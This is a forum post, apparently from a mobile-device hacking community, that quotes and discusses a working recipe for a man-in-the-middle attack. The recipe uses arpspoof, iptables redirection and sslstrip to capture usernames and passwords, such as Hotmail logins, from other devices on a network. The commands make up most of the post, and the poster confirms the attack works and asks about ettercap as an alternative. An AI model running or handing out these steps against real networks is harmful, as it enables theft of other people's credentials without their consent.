View Single Post
Posts: 63 | Thanked: 27 times | Joined on Apr 2011
#180
Originally Posted by karam View Post
i would like to ask you guys to test the new arpspoof
with sslstrip before comax adapte it to YAMAS

Code:
sudo gainroot
Code:
apt-get install dsniff sslstrip iptables
#press y
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port #pickupanemptyport
arpspoof -i wlan0 -t #target #routerip
sslstrip -l #thesamepickedupnumber
then try to access ex:hotmail from PC
then CTRL+C
then see the sslstrip.log
you should see the pass and the username
i have tested it with arpspoof and it works perfect!! but it work perfect with sslstrip v0.7!!! with sslstrip v0.9 the connection get stuck the majority of times.

How is it going the ettercap 0.74 thing?? you already contact with the maintainer of the packet?? maybe with the new version of ettercap the connection dont get stuck, because altough arpspoof do the job well, ettercap with all is plugins and filters gives a more complete MITM experience

I would love to know how to compile pentesting programs to be able to port it to N900 and N9. some tutorial, book o guide you recommend me?? i really admire your contribution to this community.